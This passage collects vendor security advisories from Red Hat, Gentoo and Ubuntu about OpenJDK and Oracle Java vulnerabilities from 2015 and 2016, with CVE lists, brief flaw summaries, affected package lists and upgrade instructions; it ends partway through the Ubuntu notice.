Synopsis: Important: java-1.6.0-openjdk security update Advisory ID: RHSA-2015:2086-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2086.html Issue date: 2015-11-18 CVE Names: CVE-2015-4734 CVE-2015-4803 CVE-2015-4805 CVE-2015-4806 CVE-2015-4835 CVE-2015-4842 CVE-2015-4843 CVE-2015-4844 CVE-2015-4860 CVE-2015-4872 CVE-2015-4881 CVE-2015-4882 CVE-2015-4883 CVE-2015-4893 CVE-2015-4903 CVE-2015-4911 =====================================================================
- Summary:
Updated java-1.6.0-openjdk packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5, 6, and 7.
Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux (v. 5 server) - i386, x86_64 Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Java Software Development Kit.
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions. (CVE-2015-4835, CVE-2015-4881, CVE-2015-4843, CVE-2015-4883, CVE-2015-4860, CVE-2015-4805, CVE-2015-4844)
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed. (CVE-2015-4803, CVE-2015-4893, CVE-2015-4911)
It was discovered that the Security component in OpenJDK failed to properly check if a certificate satisfied all defined constraints. In certain cases, this could cause a Java application to accept an X.509 certificate which does not meet requirements of the defined policy. (CVE-2015-4872)
Multiple flaws were found in the Libraries, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2015-4806, CVE-2015-4882, CVE-2015-4842, CVE-2015-4734, CVE-2015-4903)
Red Hat would like to thank Andrea Palazzo of Truel IT for reporting the CVE-2015-4806 issue.
All users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1233687 - CVE-2015-4806 OpenJDK: HttpURLConnection header restriction bypass (Libraries, 8130193) 1273022 - CVE-2015-4835 OpenJDK: insufficient permission checks in StubGenerator (CORBA, 8076383) 1273027 - CVE-2015-4881 OpenJDK: missing type checks in IIOPInputStream (CORBA, 8076392) 1273053 - CVE-2015-4843 OpenJDK: java.nio Buffers integer overflow issues (Libraries, 8130891) 1273304 - CVE-2015-4883 OpenJDK: incorrect access control context used in DGCClient (RMI, 8076413) 1273308 - CVE-2015-4860 OpenJDK: incorrect access control context used in DGCImpl (RMI, 8080688) 1273311 - CVE-2015-4805 OpenJDK: missing checks for proper initialization in ObjectStreamClass (Serialization, 8103671) 1273318 - CVE-2015-4844 ICU: missing boundary checks in layout engine (OpenJDK 2D, 8132042) 1273414 - CVE-2015-4882 OpenJDK: incorrect String object deserialization in IIOPInputStream (CORBA, 8076387) 1273425 - CVE-2015-4842 OpenJDK: leak of user.dir location (JAXP, 8078427) 1273430 - CVE-2015-4734 OpenJDK: kerberos realm name leak (JGSS, 8048030) 1273496 - CVE-2015-4903 OpenJDK: insufficient proxy class checks in RemoteObjectInvocationHandler (RMI, 8076339) 1273637 - CVE-2015-4803 OpenJDK: inefficient use of hash tables and lists during XML parsing (JAXP, 8068842) 1273638 - CVE-2015-4893 OpenJDK: incomplete MaxXMLNameLimit enforcement (JAXP, 8086733) 1273645 - CVE-2015-4911 OpenJDK: incomplete supportDTD enforcement (JAXP, 8130078) 1273734 - CVE-2015-4872 OpenJDK: incomplete constraints enforcement by AlgorithmChecker (Security, 8131291)
- Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el5_11.src.rpm
i386: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el5_11.i386.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el5_11.i386.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el5_11.i386.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el5_11.i386.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el5_11.i386.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el5_11.i386.rpm
x86_64: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el5_11.src.rpm
i386: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el5_11.i386.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el5_11.i386.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el5_11.i386.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el5_11.i386.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el5_11.i386.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el5_11.i386.rpm
x86_64: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el5_11.x86_64.rpm
Red Hat Enterprise Linux Desktop (v. 6):
Source: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.src.rpm
i386: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.src.rpm
x86_64: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.src.rpm
i386: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.src.rpm
i386: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.i686.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el6_7.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.src.rpm
x86_64: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.src.rpm
x86_64: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.src.rpm
ppc64: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm
s390x: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.s390x.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.s390x.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el7_1.s390x.rpm
x86_64: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el7_1.ppc64.rpm
s390x: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.s390x.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el7_1.s390x.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el7_1.s390x.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el7_1.s390x.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.src.rpm
x86_64: java-1.6.0-openjdk-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.37-1.13.9.4.el7_1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-4734 https://access.redhat.com/security/cve/CVE-2015-4803 https://access.redhat.com/security/cve/CVE-2015-4805 https://access.redhat.com/security/cve/CVE-2015-4806 https://access.redhat.com/security/cve/CVE-2015-4835 https://access.redhat.com/security/cve/CVE-2015-4842 https://access.redhat.com/security/cve/CVE-2015-4843 https://access.redhat.com/security/cve/CVE-2015-4844 https://access.redhat.com/security/cve/CVE-2015-4860 https://access.redhat.com/security/cve/CVE-2015-4872 https://access.redhat.com/security/cve/CVE-2015-4881 https://access.redhat.com/security/cve/CVE-2015-4882 https://access.redhat.com/security/cve/CVE-2015-4883 https://access.redhat.com/security/cve/CVE-2015-4893 https://access.redhat.com/security/cve/CVE-2015-4903 https://access.redhat.com/security/cve/CVE-2015-4911 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201603-11
https://security.gentoo.org/
Severity: Normal Title: Oracle JRE/JDK: Multiple vulnerabilities Date: March 12, 2016 Bugs: #525472, #540054, #546678, #554886, #563684, #572432 ID: 201603-11
Synopsis
Multiple vulnerabilities have been found in Oracle's JRE and JDK software suites allowing remote attackers to remotely execute arbitrary code, obtain information, and cause Denial of Service.
Background
Java Platform, Standard Edition (Java SE) lets you develop and deploy Java applications on desktops and servers, as well as in today's demanding embedded environments. Java offers the rich user interface, performance, versatility, portability, and security that today's applications require.
Workaround
There is no known workaround at this time.
Resolution
All Oracle JRE Users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.8.0.72"
All Oracle JDK Users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.8.0.72"
References
[ 1 ] CVE-2015-0437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0437 [ 2 ] CVE-2015-0437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0437 [ 3 ] CVE-2015-0458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0458 [ 4 ] CVE-2015-0459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0459 [ 5 ] CVE-2015-0460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0460 [ 6 ] CVE-2015-0469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0469 [ 7 ] CVE-2015-0470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0470 [ 8 ] CVE-2015-0477 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0477 [ 9 ] CVE-2015-0478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0478 [ 10 ] CVE-2015-0480 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0480 [ 11 ] CVE-2015-0484 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0484 [ 12 ] CVE-2015-0486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0486 [ 13 ] CVE-2015-0488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0488 [ 14 ] CVE-2015-0491 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0491 [ 15 ] CVE-2015-0492 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0492 [ 16 ] CVE-2015-2590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2590 [ 17 ] CVE-2015-2601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2601 [ 18 ] CVE-2015-2613 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2613 [ 19 ] CVE-2015-2619 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2619 [ 20 ] CVE-2015-2621 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2621 [ 21 ] CVE-2015-2625 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2625 [ 22 ] CVE-2015-2627 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2627 [ 23 ] CVE-2015-2628 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2628 [ 24 ] CVE-2015-2632 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2632 [ 25 ] CVE-2015-2637 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2637 [ 26 ] CVE-2015-2638 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2638 [ 27 ] CVE-2015-2659 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2659 [ 28 ] CVE-2015-2664 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2664 [ 29 ] CVE-2015-4000 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4000 [ 30 ] CVE-2015-4729 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4729 [ 31 ] CVE-2015-4731 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4731 [ 32 ] CVE-2015-4732 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4732 [ 33 ] CVE-2015-4733 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4733 [ 34 ] CVE-2015-4734 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4734 [ 35 ] CVE-2015-4734 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4734 [ 36 ] CVE-2015-4736 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4736 [ 37 ] CVE-2015-4748 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4748 [ 38 ] CVE-2015-4760 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4760 [ 39 ] CVE-2015-4803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4803 [ 40 ] CVE-2015-4803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4803 [ 41 ] CVE-2015-4805 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4805 [ 42 ] CVE-2015-4805 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4805 [ 43 ] CVE-2015-4806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4806 [ 44 ] CVE-2015-4806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4806 [ 45 ] CVE-2015-4810 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4810 [ 46 ] CVE-2015-4810 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4810 [ 47 ] CVE-2015-4835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4835 [ 48 ] CVE-2015-4835 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4835 [ 49 ] CVE-2015-4840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4840 [ 50 ] CVE-2015-4840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4840 [ 51 ] CVE-2015-4842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4842 [ 52 ] CVE-2015-4842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4842 [ 53 ] CVE-2015-4843 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4843 [ 54 ] CVE-2015-4843 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4843 [ 55 ] CVE-2015-4844 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4844 [ 56 ] CVE-2015-4844 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4844 [ 57 ] CVE-2015-4860 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4860 [ 58 ] CVE-2015-4860 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4860 [ 59 ] CVE-2015-4868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4868 [ 60 ] CVE-2015-4868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4868 [ 61 ] CVE-2015-4871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4871 [ 62 ] CVE-2015-4871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4871 [ 63 ] CVE-2015-4872 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4872 [ 64 ] CVE-2015-4872 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4872 [ 65 ] CVE-2015-4881 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4881 [ 66 ] CVE-2015-4881 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4881 [ 67 ] CVE-2015-4882 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4882 [ 68 ] CVE-2015-4882 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4882 [ 69 ] CVE-2015-4883 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4883 [ 70 ] CVE-2015-4883 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4883 [ 71 ] CVE-2015-4893 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4893 [ 72 ] CVE-2015-4893 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4893 [ 73 ] CVE-2015-4901 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4901 [ 74 ] CVE-2015-4901 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4901 [ 75 ] CVE-2015-4902 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4902 [ 76 ] CVE-2015-4902 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4902 [ 77 ] CVE-2015-4903 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4903 [ 78 ] CVE-2015-4903 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4903 [ 79 ] CVE-2015-4906 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4906 [ 80 ] CVE-2015-4906 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4906 [ 81 ] CVE-2015-4908 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4908 [ 82 ] CVE-2015-4908 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4908 [ 83 ] CVE-2015-4911 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4911 [ 84 ] CVE-2015-4911 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4911 [ 85 ] CVE-2015-4916 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4916 [ 86 ] CVE-2015-4916 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4916 [ 87 ] CVE-2015-7840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7840 [ 88 ] CVE-2015-7840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7840
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201603-11
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . Content-Disposition: inline
==========================================================================Ubuntu Security Notice USN-2827-1 December 03, 2015
openjdk-6 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in OpenJDK 6.
Software Description: - openjdk-6: Open Source Java implementation
Details:
Multiple vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. (CVE-2015-4805, CVE-2015-4835, CVE-2015-4843, CVE-2015-4844, CVE-2015-4860, CVE-2015-4881, CVE-2015-4883)
A vulnerability was discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit this to expose sensitive data over the network. (CVE-2015-4806)
A vulnerability was discovered in the OpenJDK JRE related to data integrity. An attacker could exploit this expose sensitive data over the network. (CVE-2015-4872)
